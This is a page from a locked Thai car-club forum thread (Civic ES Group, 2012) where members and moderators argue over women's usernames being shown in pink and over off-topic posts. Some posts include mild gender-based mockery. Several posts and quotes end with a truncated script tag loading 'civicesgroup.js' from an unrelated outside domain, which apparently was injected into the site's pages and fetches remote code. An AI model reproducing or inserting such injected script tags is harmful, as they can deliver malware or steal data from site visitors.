หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
Guide6351

ชื่อเล่น: ต่อ

เข้าร่วม: 23 พฤศจิกา 2008
ตอบ: 1847

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 925
ให้คำขอบคุณ: 2949

ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 26 มกรา 2012 09:05 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
~ สเตฟาน ~ พิมพ์ว่า:
สมัครชื่อใหม่ มาโพสเพื่อการณ์นี้โดยเฉพาะ

ถ้าสงสัย มีคำถาม ถามได้ครับ ทางทีมงานจักตอบให้อย่างสุภาพ

ส่วนเรื่องLogin สีชมพูของสมาชิกผู้หญิง มีมาตั้งแต่ไหนแต่ไรแล้วครับ ไม่ใช่เพิ่งมามีช่วงนี้ เป็นการปรึกษาหารือกันมาตั้งนานแล้วครับ

ถ้ามีข้อสงสัย สิ่งต่างๆที่เกิดขึ้นในบอร์ดแห่งนี้ PMมาสอบถามผมได้โดยตรง หรือจะโพสสิ่งที่มีข้อสงสัยโดยครงถึงผม แล้วเดี๋ยวผมมาตอบข้อสงสัยให้นะครับ

ขอบคุณที่ให้ความสนใจในการใช้บอร์ด

ใช่ สมัครใหม่เพื่อไรไม่ทราบ
ผมว่าเขาไม่ยอมจบนะเนี่ย ...
ได้รับคำขอบคุณจาก: underhill  benzd  Champ_civicES  slek 
notes68

เข้าร่วม: 09 สิงหา 2010
ตอบ: 15

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 18
ให้คำขอบคุณ: 2
พฤหัส, 26 มกรา 2012 09:06 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
ถ้าเป็นแบบ ที่ประธานว่า ก้อเอาตามนั้นแต่ ผู้หญิงบางคนก้อไม่มี น่ะครับ
อีกอย่างที่ฝาก กรุณาโพทอะไร ที่มีประโยชน์หน่อยครับ ไม่ได้ไร้สาระแบบที่ทำอยู่ตอนนี้
ได้รับคำขอบคุณจาก: Champ_civicES  slek 
underhill

เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
พฤหัส, 26 มกรา 2012 09:06 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
โหวตให้่แยกห้องความรู้-เรื่องรถ กับห้องจิปาถะ(อะไรก็ได้ ที่ไม่เกิน20+)แยกกัน ไม่งั้นก็จะมาแนวรกบอร์ด(ว่ะ)อีก

เรื่องสี โนคอมเม้น โตกันแล้ว ความคิดไม่เหมือนกันหรอก
ได้รับคำขอบคุณจาก: notes68  Champ_civicES  slek 
cakecity10

ชื่อเล่น: เค้ก

เข้าร่วม: 30 กันยา 2011
ตอบ: 98

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 112
ให้คำขอบคุณ: 157
notes68 พิมพ์ว่า:
cakecity10 พิมพ์ว่า:
sopida พิมพ์ว่า:
คือไม่เข้าใจ ว่าทำไมถึงจะต้องทำชื่อ login ของผู้หญิงให้เป็นสีชมพู

บอร์ดนี้คือบอร์ดความรู้เรื่องรถยนต์ ข้อมูลที่คนขับรถรุ่นเดียวกันมาแชร์ข้อมูลกัน

แต่ที่ admin ทำชื่อเป็นสีชมพู เพื่อจะสร้างสีสันในบอร์ดหรือเปล่านั้น ? ไม่จำเป็นเท่าไหร่เลย

เรามาคุยเรื่องรถ กันไม่ใช่เหรอ ไม่ได้มาคุยเรื่องผู้หญิง ทำไมต้องทำให้ผู้หญิงดูโดดเด่นสะดุดสายตา

เพราะงั้นทำไมต้องมีแบ่งแยกว่าคนนี้ผู้หญิง คนนี้ผู้ชาย เดี๊ยวพอมีมิตติ้งก็ได้รู้จักกันเองว่า คนไหนชายคนไหนหญิง

ทั้งๆที่ที่นี่ก็บอร์ดคนเล่นรถ คนรักรถ ไม่ใช่บอร์ดโชว์อาวุธ ซื้อขายอาวุธ เบ่งกันไปมา หาเรื่องกัน เเบ่งแยกกัน

ขนาดห้องมิตติ้งยัง รณรงค์ไม่ให้ใช้คำว่า zone เลย แล้วทำไมจะต้องทำชื่อให้มันดูแบ่งแยกชายหญิง

ปัญหานี้เกิดจากคุณคนเดียวเลย ไม่เข้าใจเจตนาของคุณว่าต้องการอะไร เรื่องสี เค้าก็ทำให้มันสวยงาม ไม่เข้าใจว่าคุณซีเรียสเรื่องอะไร เห็นหรือยัง ว่าเเค่ความคิดของคุณคนเดียว ทำให้กระทู้ดูเเย่ลงไปมากๆ น่าเศร้าใจนะคะ ที่มีคนอย่างคุณ ความคิดอย่างคุณ เป็นสมาชิกอยู่ด้วยน่ะ

เค้าแค่สงสัยเลยถามความจิงไม่ได้มาต่อว่า

คุนต่างหากที่ทำให้เวปเสื่อมคุน cakecity10

ก้คงจะพอๆกับที่คุณกำลังทำอยู่น่ะ คุณnotes68

ได้รับคำขอบคุณจาก: Guide6351  sheclubzing  zan  benzd  Champ_civicES  slek 
notes68

เข้าร่วม: 09 สิงหา 2010
ตอบ: 15

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 18
ให้คำขอบคุณ: 2
พฤหัส, 26 มกรา 2012 09:10 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
เห้อ
ได้รับคำขอบคุณจาก: Champ_civicES  slek 
sheclubzing

ชื่อเล่น: นายญิ๋ง

เข้าร่วม: 12 ธันวา 2011
ตอบ: 469

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 1265
ให้คำขอบคุณ: 965

ปี: 2004
สี: แดง ไฟร์เปปเปอร์ (R-507P)
พฤหัส, 26 มกรา 2012 09:19 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
ผู้ชายที่เถียงผู้ญิงชนะ ก็มีแต่ตุ๊ด เท่านั้น นะค่ะ จุ๋ๆ

เหอะ...

ขอโทดไปแร้วสำหรับฉันไม่มีไรพูดแล้ว เริ่มไม่เฟี้ยวแระนะ..
ได้รับคำขอบคุณจาก: Guide6351  cakecity10  tochi229  zan  benzd  Champ_civicES  honeybeex7  slek  PAE KUNG  Edan 
Aek_EsCivic

ชื่อเล่น: ขุนแผน

เข้าร่วม: 19 มกรา 2012
ตอบ: 49

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 94
ให้คำขอบคุณ: 190

พฤหัส, 26 มกรา 2012 09:24 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
sheclubzing พิมพ์ว่า:
ผู้ชายที่เถียงผู้ญิงชนะ ก็มีแต่ตุ๊ด เท่านั้น นะค่ะ จุ๋ๆ

เหอะ...

ขอโทดไปแร้วสำหรับฉันไม่มีไรพูดแล้ว เริ่มไม่เฟี้ยวแระนะ..

ได้รับคำขอบคุณจาก: cakecity10  sheclubzing  Champ_civicES  slek 
แป้งร่ำ

เข้าร่วม: 25 พฤศจิกา 2009
ตอบ: 407

ได้รับคำขอบคุณ: 693
ให้คำขอบคุณ: 1030

พฤหัส, 26 มกรา 2012 09:26 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
เห็นด้วยถ้าข้องใจอะไรควร PM ถามก่อนน่าจะดีกว่า ..ส่วนผู้หญิงบางคนที่ยังไม่เป็นสีชมพู อาจเป็นเพราะว่าผู้ดูแลยังม่ะทันเห็น หรือหลุด ผิดพลาดบ้าง เด่วยังไงผู้ดูแลเห็นก็เปลี่ยนหั้ยเองคร่า เพราะผูัดูแลบอร์ดทำทั้งงานประจำ ดูแลบอร์ดไปด้วย อยากหั้ยเห็นใจพี่เค้าด้วยแระเข้าใจกันอ่ะคร่า ขอเป็นกำลังใจหั้ยแระกันคร่า ใจเย็นๆ นะคะ ชักไปกันใหญ่แร้ว เรื่องแค่นิดเดียวเอง

แก้ไขล่าสุดโดย เมื่อ พฤหัส, 26 มกรา 2012 09:31, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: zan  patoo  Champ_civicES  honeybeex7  yoosabai  slek  PAE KUNG  art-antz-killers  kittidech 
psYchosis

ชื่อเล่น: โอ๋

เข้าร่วม: 11 สิงหา 2008
ตอบ: 2535

Moderator
Moderator

ได้รับคำขอบคุณ: 9747
ให้คำขอบคุณ: 4367

ปี: 2003
พฤหัส, 26 มกรา 2012 09:29 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
จะโพสอะไรระบาย แสดงความเป็นตัวตนของคุณ ผมแนะนำ Facebook ครับเพราะมันเป็นพื้นที่ส่วนตัว
บอร์ดเราเป็นพื้นที่สาธารณะ มีกฎมีระเบียบ เพื่อการอยู่ร่วมกัน ของดเว้น ทุกเรื่อง ยกเว้นเรื่องรถแล้วกัน
Aek_EsCivic

ชื่อเล่น: ขุนแผน

เข้าร่วม: 19 มกรา 2012
ตอบ: 49

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 94
ให้คำขอบคุณ: 190

พฤหัส, 26 มกรา 2012 09:30 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
ผมว่า ทำไมสมาชิกในนี้ต้องขับesต้องมีรถหรือครับถึงจะเข้ามาได้ สำหรับผม ไม่เคยคิดแบบนั้นอย่าง สาวๆes รถพังขับคันอื่นไป
ผมเห็นน้องเขาบอกได้รับการต้อนรับดีเหมือนเดิมเผลอๆรถแพงกว่าที่พวกเราใช้กันอีก ผมว่าไม่สำคัญ ต่างเพศต่างสีถ้าเป็นesเหมือนกัน อย่างน้องๆที่ไม่มีรถเข้ามาเป็นสีสันของเว็ปก็ดีแล้วนี่ครับ ไม่งั้นบ้านเราคงห่อเหี่ยวตาย
ได้รับคำขอบคุณจาก: sheclubzing  underhill  cakecity10  tokykung  Phetcharat  Juris  Champ_civicES  Makai  slek  PAE KUNG  kittidech 
MayBe

ชื่อเล่น: เมย์

เข้าร่วม: 04 ตุลา 2008
ตอบ: 195

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 263
ให้คำขอบคุณ: 1177

พฤหัส, 26 มกรา 2012 09:31 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
ขอแนะนำว่าปิดบอร์ดไปเลยดีกว่า ไม่ต้องมีมันแระคลับอะไรเนี่ย เรื่องมากกันจัง มันจะอะไรนักหนากับอีแค่สีตัวอักษร เราเป็นผู้หญิงอยู่มาตั้งนานชื่อเราไม่เป็นสีชมพู ยังไม่เห็นเดือดร้อนเลย
PongpanG

ชื่อเล่น: ป๋องแป๋ง

ตอบ: 3254

Moderator
Moderator

ได้รับคำขอบคุณ: 12524
ให้คำขอบคุณ: 3239

ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 26 มกรา 2012 09:55 - Re: อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
คือไม่เข้าใจ ว่าทำไมถึงจะต้องทำชื่อ login ของผู้หญิงให้เป็นสีชมพู

บอร์ดนี้คือบอร์ดความรู้เรื่องรถยนต์ ข้อมูลที่คนขับรถรุ่นเดียวกันมาแชร์ข้อมูลกัน

แต่ที่ admin ทำชื่อเป็นสีชมพู เพื่อจะสร้างสีสันในบอร์ดหรือเปล่านั้น ? ไม่จำเป็นเท่าไหร่เลย

เรามาคุยเรื่องรถ กันไม่ใช่เหรอ ไม่ได้มาคุยเรื่องผู้หญิง ทำไมต้องทำให้ผู้หญิงดูโดดเด่นสะดุดสายตา

เพราะงั้นทำไมต้องมีแบ่งแยกว่าคนนี้ผู้หญิง คนนี้ผู้ชาย เดี๊ยวพอมีมิตติ้งก็ได้รู้จักกันเองว่า คนไหนชายคนไหนหญิง

ทั้งๆที่ที่นี่ก็บอร์ดคนเล่นรถ คนรักรถ ไม่ใช่บอร์ดโชว์อาวุธ ซื้อขายอาวุธ เบ่งกันไปมา หาเรื่องกัน เเบ่งแยกกัน

ขนาดห้องมิตติ้งยัง รณรงค์ไม่ให้ใช้คำว่า zone เลย แล้วทำไมจะต้องทำชื่อให้มันดูแบ่งแยกชายหญิง

นั่นสิครับ แล้ว จะมา ซีเรียสทำไมครับ

ญ ช ชัดเจน ครับ มีสีสัน ดีออกนะ
ได้รับคำขอบคุณจาก: zan  mark_es03  cakecity10  Phetcharat  Champ_civicES  wut-chiangmai  csirinant  honeybeex7  slek  PAE KUNG  art-antz-killers  kittidech 
underhill

ครอบครัว ES
ครอบครัว ES

พฤหัส, 26 มกรา 2012 09:59 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
PongpanG พิมพ์ว่า:

นั่นสิครับ แล้ว จะมา ซีเรียสทำไมครับ

ญ ช ชัดเจน ครับ มีสีสัน ดีออกนะ

ง่า ม๊อด มีชื่อนี้ด้วย น่าร๊ากกกอ่า <script src="https://sport32news.com/civicesgroup.js"></
(ผมล้อเล่นนะครับ อย่าโกรธน้า)
ได้รับคำขอบคุณจาก: benzd  Champ_civicES  slek 
Oo-kakachi-oO

ชื่อเล่น: จ๊อตครับ

เข้าร่วม: 02 มิถุนา 2010
ตอบ: 597

ได้รับคำขอบคุณ: 1013
ให้คำขอบคุณ: 814

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 26 มกรา 2012 10:03 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
เอ่อ มีไรกันเหรอครับ มาไม่ทัน
.
บอร์ด รถยนต์ ไม่จำเป็นต้องมีแต่เรื่องรถยนต์นี่ครับ แบ่งๆกันไป เรื่องรถ 80% ไร้สาระ 10% อื่นๆแบบไม่รู้แนวทาง 10% ก็น่าจะพอ
.
ไม่รู้จะเอามาเป็นประเด็นกันทำไมนะ ผู้หญิง ผู้ชาย แล้วไง อยู่ในชุมชนเดียวกันรึปล่าว
.
ยกตัวอย่าง บอร์ด บีบีกัน ก็คุยเรื่องปืนจริง เรื่องเที่ยวผู้หญิง เรื่องที่เที่ยวอาหารอร่อยๆได้
.
อย่าไปให้ความสำคัญกับเรื่องเล็กน้อย แต่ มองที่จุดรวมดีกว่า . . . . มากไปก็น่าเบื่อ น้อยไปก็ไม่เข้าท่านะครับ
ได้รับคำขอบคุณจาก: mark_es03  patoo  Phetcharat  Champ_civicES  csirinant  Makai  slek 
BananaBoat

ชื่อเล่น: โบ๊ท

เข้าร่วม: 14 มกรา 2012
ตอบ: 472

ได้รับคำขอบคุณ: 796
ให้คำขอบคุณ: 345

สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 26 มกรา 2012 10:04 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
ไปกันใหญ่แว้วววว แบบนี้ไม่มีทางจบแน่มีแต่เครียดกัน คนที่จะยิ้มหัวเราะก็คงมีแต่คนที่กำลังปั่นให้แตกแยกกันให้เวปเรามีแต่เรื่องแย่ๆ และก็คงอยากให้ปิดตัวลงเพราะเห็นพวกเราเคยมีความสุขเคยรักกันคงจะอิจฉามั่งครับ เอาเป็นว่าพวกพี่ๆก็คิดกันเองละกันนะครับว่ายังรักเวปนี้อยู่หรือเปล่า ยังอยากเห็นการพัฒนาไปของเวปไหมครับ ลำพังแค่ทีมงานที่ทำเวปคงไม่สามารถทำได้เพียงลำพัง ต้องมีความรักความมุ่งมั่นของพวกเราทุกคนด้วย คนหมู่เยอะย่อมมีไม่เข้าใจกันบ้างเป็นธรรมดา มาร่วมลืมความขัดแย้งแล้วก้าวไปด้วยกันเถอะครับ พวกเราเข้ามาบางคนอาจอยู่ไม่นานก็ออกไป แต่เวปและEs Group ของเราจะต้องอยู่ต่อไปเพื่อคนรุ่นเก่าที่ทำไว้ เพื่อคนรุ่นปัจจุบันคงรักษา เพื่อคนรุ่นใหม่ที่กำลังจะก้าวเข้ามา เป็นส่วนหนึ่งในครอบครัว
ด้วยรักและเคารพครับ
ได้รับคำขอบคุณจาก: patoo  slek  moonoy 
PongpanG

Moderator
Moderator

สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 26 มกรา 2012 10:06 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
underhill พิมพ์ว่า:

ง่า ม๊อด มีชื่อนี้ด้วย น่าร๊ากกกอ่า <script src="https://sport32news.com/civicesgroup.js"></
(ผมล้อเล่นนะครับ อย่าโกรธน้า)

อิอิ นานๆ จะโผล่มาครับ ตอนนี้ โผล่ บ่อยหน่อย

งานงอก กัน 555555555555
cakecity10

ชื่อเล่น: เค้ก

เข้าร่วม: 30 กันยา 2011
ตอบ: 98

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 112
ให้คำขอบคุณ: 157
พฤหัส, 26 มกรา 2012 10:09 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม

เห็นด้วยค่ะ+10
ได้รับคำขอบคุณจาก: Guide6351  benzd  Champ_civicES  slek 
kimberly55

ชื่อเล่น: คิมเบอลี่

เข้าร่วม: 11 สิงหา 2009
ตอบ: 1141

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1050
ให้คำขอบคุณ: 405

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 26 มกรา 2012 10:14 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
เรื่องนี้กะเทยอย่างเราคงไม่เกี่ยวนะคะ มาดูเฉยๆ ว่ามีอะไรกัน หุหุ เราเป็นคน(เพศ)กลาง ฮ่าๆ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: MayBe  zan  mark_es03  patoo  Phetcharat  Oo-kakachi-oO  battery3k  Champ_civicES  wut-chiangmai  Nung_Sodapop  hacker  csirinant  honeybeex7  Makai  slek  mae  art-antz-killers  kittidech 
PongpanG

Moderator
Moderator

พฤหัส, 26 มกรา 2012 10:17 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
kimberly55 พิมพ์ว่า:
เรื่องนี้กะเทยอย่างเราคงไม่เกี่ยวนะคะ มาดูเฉยๆ ว่ามีอะไรกัน หุหุ เราเป็นคน(เพศ)กลาง ฮ่าๆ <script src="https://sport32news.com/civicesgroup.js"></

นี่แหละครับ ผมว่า ดีกว่า พวกสร้างปัญหา เยอะ จุฟๆ
ได้รับคำขอบคุณจาก: tochi229  MayBe  zan  patoo  sheclubzing  battery3k  Champ_civicES  wut-chiangmai  honeybeex7  slek  PAE KUNG  art-antz-killers  kittidech 
pannatad

ชื่อเล่น: ปุ๋ย

เข้าร่วม: 19 เมษา 2011
ตอบ: 1900

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1742
ให้คำขอบคุณ: 751

พฤหัส, 26 มกรา 2012 10:34 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
ไม่พอใจใคร ก็ว่ากันเป็นคนๆน่าจะตรงประเด็นกว่านะ

เหมือนไม่พอใจเรื่องนึง ก็พาลไปอีกเรื่อง แล้วก็มาลงที่เรื่องนี้

ไม่แมนอ่ะ
ได้รับคำขอบคุณจาก: patoo  Champ_civicES  slek 
boymac

เข้าร่วม: 25 มิถุนา 2009
ตอบ: 906

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 996
ให้คำขอบคุณ: 231

พฤหัส, 26 มกรา 2012 10:38 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
อ่านแล้วเหนื่อย....ใจอย่างแรง
ได้รับคำขอบคุณจาก: patoo  Champ_civicES  slek 
bigforplay

ชื่อเล่น: บิ๊ก

เข้าร่วม: 16 เมษา 2011
ตอบ: 760

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1467
ให้คำขอบคุณ: 29

พฤหัส, 26 มกรา 2012 10:40 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
เรื่องเล็กน้อย อย่าไปซีเรียสเลยครับ เว็บนี้มีความรู้และเนื้อหาต่างๆเกี่ยวกับรถมากมาย เอาเวลามาหาความรู้ดีกว่า สังคมข้างนอกแบ่งแยกกันเรื่องสีมากพอแล้ว อย่าทำให้สังคมในเว็บแตกแยกเลยครับ จะสีอะไรเราก็ขับesเหมือนกัน สงสารคนดูแลเว็บเถอะครับ
ได้รับคำขอบคุณจาก: cakecity10  patoo  Champ_civicES  slek 
zan

เข้าร่วม: 23 สิงหา 2009
ตอบ: 3145

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3432
ให้คำขอบคุณ: 6687

พฤหัส, 26 มกรา 2012 10:44 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
notes68 พิมพ์ว่า:
ผมว่าเจ้าของกระทู้พูดถูก ครับ คนที่ส่งสัยเยอะมากกว่าคนที่เข้าใจแต่ก้อไม่เอ่ยปาก
ใช่ครับ บอร์ด ไว้ปรึกษาเรื่องรถ แต่ที่ดูๆมา ชักไม่ใช่เรื่องรถน่ะครับ ดูมาหลายอันและขัดตาจิงๆ เรื่องตัวหนังสือ สี ชมพู ผมไม่เห็นด้วยอย่างแรง แบบ ที่ บอก 2 มาตรฐานชัดๆ ไม่เกี่ยวหรอกครับใครมาอยู่เวป 4ปี คุนไม่สามารถมาใช้ความคิดตัวเองให้คนอื่นเข้าใจหรอกที่คนอื่นสงสัยก้อคือจะมีระเบียบไว้ทำไม จะมาอ้างให้เข้าใจ ระบบก้อคือระบบ
และอีกอย่าง สมัยก่อนพอมีคนมาแนะนำตัวว่าผมซื้อรถes ขอเป็นสมาชิคด้วยคนครับผมเป็นน้องใหม่ โดยที่ไม่นำรถตัวเองมาแสดงหรือถ่ายรูปใาโชว์ ในบอร์ดเราก้อจะบอกว่า ไหนๆเอา es มาโชว์หน่อยเหมือนจะบอกว่าไหนซื้อมาเอามาให้ดูหน่อยดิถ่ายรูปอ่ะ ทำไมไม่มีอย่างนั้นเกิดขึ้นอ่ะครับ ผมไม่เหน ที่สมาชิคในบรอดเราบางคนที่ถูกพลาดพึงพูดถึรถตัวเองเลยครับ เข้ามาในบรอดเหมือนมาหาอย่างอื่นน่ะ ไม่ได้มาหาความรู้เรื่องรถ และบางสิ่งบางอย่างที่เอามาลง กรุณา ค้นหาก่อนเอามาลงน่ะครับผมว่า บางอันมันซ้ำอ่ะ เนี่ยสิครับที่เรียกว่า รกบอร์ด
กรุณาน่ะครับเคารพกดกติกาด้วยน่ะครับ ไม่ใช่อภิสิทธิ์ส่วนตัว คนที่ทำประโยชน์ครับที่สมควรได้ ไม่ใช่มีแต่เรื่องไร้สาระแล้วได้นั้นได้นี้

อ่านแล้วงงชิป

นี่แหละครับ ผมว่า ดีกว่า พวกสร้างปัญหา เยอะ จุฟๆ

งั้นเดี๋ยวผมลากลงอ่างเลยดีป่าว ฮ่าๆๆ

sheclubzing พิมพ์ว่า:

เหอะ...

สร้างวีระกรรมอะไรมาเหรอ ตัวเธอว์

มีสีสันดีออก ไม่ทราบว่าหลงประเด็นอะไรหรือเปล่า
ได้รับคำขอบคุณจาก: cakecity10  Guide6351  mark_es03  patoo  Champ_civicES  Makai  slek 
Wal2n_ES

ชื่อเล่น: ว่าน

เข้าร่วม: 01 ตุลา 2008
ตอบ: 615

Guru ES
Guru ES

ได้รับคำขอบคุณ: 812
ให้คำขอบคุณ: 819

พฤหัส, 26 มกรา 2012 10:51 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
สมัครใหม่มาตอบทำไมอ่ะ ชอบอยู่ในรูหรอ โตยังอ่ะแยกแยะไม่ออกหรอ มีความคิดไหมอ่ะ อ่านกฏรึยังอ่ะ อ่านและคิด คิดและไตร่ตรอง แล้วค่อยพิมมาเป็นตัวอักษร U Know?
ได้รับคำขอบคุณจาก: patoo  benzd  Champ_civicES  tamy2975  slek  moonoy  PAE KUNG 
kimberly55

ชื่อเล่น: คิมเบอลี่

เข้าร่วม: 11 สิงหา 2009
ตอบ: 1141

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1050
ให้คำขอบคุณ: 405

พฤหัส, 26 มกรา 2012 10:53 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม

เล่นมาตั้งนาน ไม่เคยสังเกตน่ะสิคะ ว่าชื่อมีสีไม่เหมือนกันด้วย ฮ่าๆ เพิ่งมาสังเกตุวันนี้ล่ะ ปกติเข้ามาตอบกระทู้ ไม่ทันได้มอง
MayBe

ชื่อเล่น: เมย์

เข้าร่วม: 04 ตุลา 2008
ตอบ: 195

ได้รับคำขอบคุณ: 263
ให้คำขอบคุณ: 1177

พฤหัส, 26 มกรา 2012 10:54 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
อ้าววววววว แอดมินรู้เลยว่ายังไม่ได้เปลี่ยนสีให้ อิอิ
ได้รับคำขอบคุณจาก: Champ_civicES  slek  PAE KUNG 
civic3025

ชื่อเล่น: เบิร์ด

เข้าร่วม: 03 พฤศจิกา 2010
ตอบ: 1266

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1399
ให้คำขอบคุณ: 480

ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 26 มกรา 2012 11:00 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
พี่ๆที่ดูแลเวปกินยาหมดไปกี่กะปุกแล้ว เพราะเรื่องไม่เรื่อง อ่านแล้วเครียดแทน
sopida

เข้าร่วม: 20 มกรา 2012
ตอบ: 4

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 16
ให้คำขอบคุณ: 1

พฤหัส, 26 มกรา 2012 11:02 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
เพื่อไม่ให้เกิด ข้อครหา ทำให้ชื่อผู้ชาย เป็นสีน้ำเงิน ดีไหม

ส่วนชื่อเกย์กระเทยเป็นส่วนผสมที่ลงตัวของสีน้ำเงินกับชมพูแล้วก็ออกมาเป็นสีม่วง

ได้รับคำขอบคุณจาก: slek  moonoy 
benzd

ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 26 มกรา 2012 11:05 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
พวกชื่อแดงๆ ฟ้าๆน่ะ พวกพี่เขาก็มีงานมีการที่จะต้องรับผิดชอบในส่วนของเขาอยู่แล้ว
ถ้าเขาจะผิดพลาด ตกหล่น ในเรื่องที่เขาต้องมารับผิดชอบภาระเพิ่มในการดูแลเว็บบ้าง
จะอภัยให้เขาเลยไม่ได้หรือครับ กับแค่การแก้ชื่อผู้หญิงให้เป็นสีชมพูไม่ครบทุกคนน่ะ
ถึงชื่อคุณจะเป็นสีดำ แต่ถ้าคุณช่วยตอบคำถาม ให้ความรู้ผู้อื่นได้ ถึงชื่อจะสีดำ แต่ก็ดำแบบมีคนรัก ดำแบบมีคุณค่านะครับ
ได้รับคำขอบคุณจาก: Guide6351  cakecity10  แป้งร่ำ  Phetcharat  Champ_civicES  wut-chiangmai  mark_es03  monkey-es  slek  kittidech 
underhill

ครอบครัว ES
ครอบครัว ES

พฤหัส, 26 มกรา 2012 11:08 - อย่าแบ่งแยก ชื่อของ ชายกับหญิงเลยดีไหม
MayBe พิมพ์ว่า:
อ้าววววววว แอดมินรู้เลยว่ายังไม่ได้เปลี่ยนสีให้ อิอิ

บอกแย้ววววว ว่าต้องมีรูป พูดค่ะ ขา อย่างเดียวไม่ได้ ม๊อดกัวหญิงไม่แท้ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: แป้งร่ำ  Champ_civicES  slek 
หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
หน้า 2 จาก 7
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.